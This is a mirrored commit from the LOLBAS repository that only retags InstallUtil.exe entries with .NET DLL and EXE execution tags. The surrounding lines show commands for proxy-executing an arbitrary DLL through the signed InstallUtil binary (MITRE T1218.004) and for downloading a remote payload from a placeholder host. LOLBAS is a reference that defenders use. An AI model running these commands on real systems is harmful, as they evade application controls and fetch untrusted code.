mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-11-04 10:39:56 +01:00 
			
		
		
		
	Update Installutil.yml
Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag
This commit is contained in:
		@@ -12,7 +12,8 @@ Commands:
 | 
			
		||||
    MitreID: T1218.004
 | 
			
		||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: DLL
 | 
			
		||||
      - Execute: .NetDLL
 | 
			
		||||
      - Execute: .NetEXE
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
 | 
			
		||||
    Description: Execute the target .NET DLL or EXE.
 | 
			
		||||
@@ -22,7 +23,8 @@ Commands:
 | 
			
		||||
    MitreID: T1218.004
 | 
			
		||||
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 | 
			
		||||
    Tags:
 | 
			
		||||
      - Execute: DLL
 | 
			
		||||
      - Execute: .NetDLL
 | 
			
		||||
      - Execute: .NetEXE
 | 
			
		||||
      - Input: Custom Format
 | 
			
		||||
  - Command: InstallUtil.exe https://example.com/payload
 | 
			
		||||
    Description: It will download a remote payload and place it in INetCache.
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user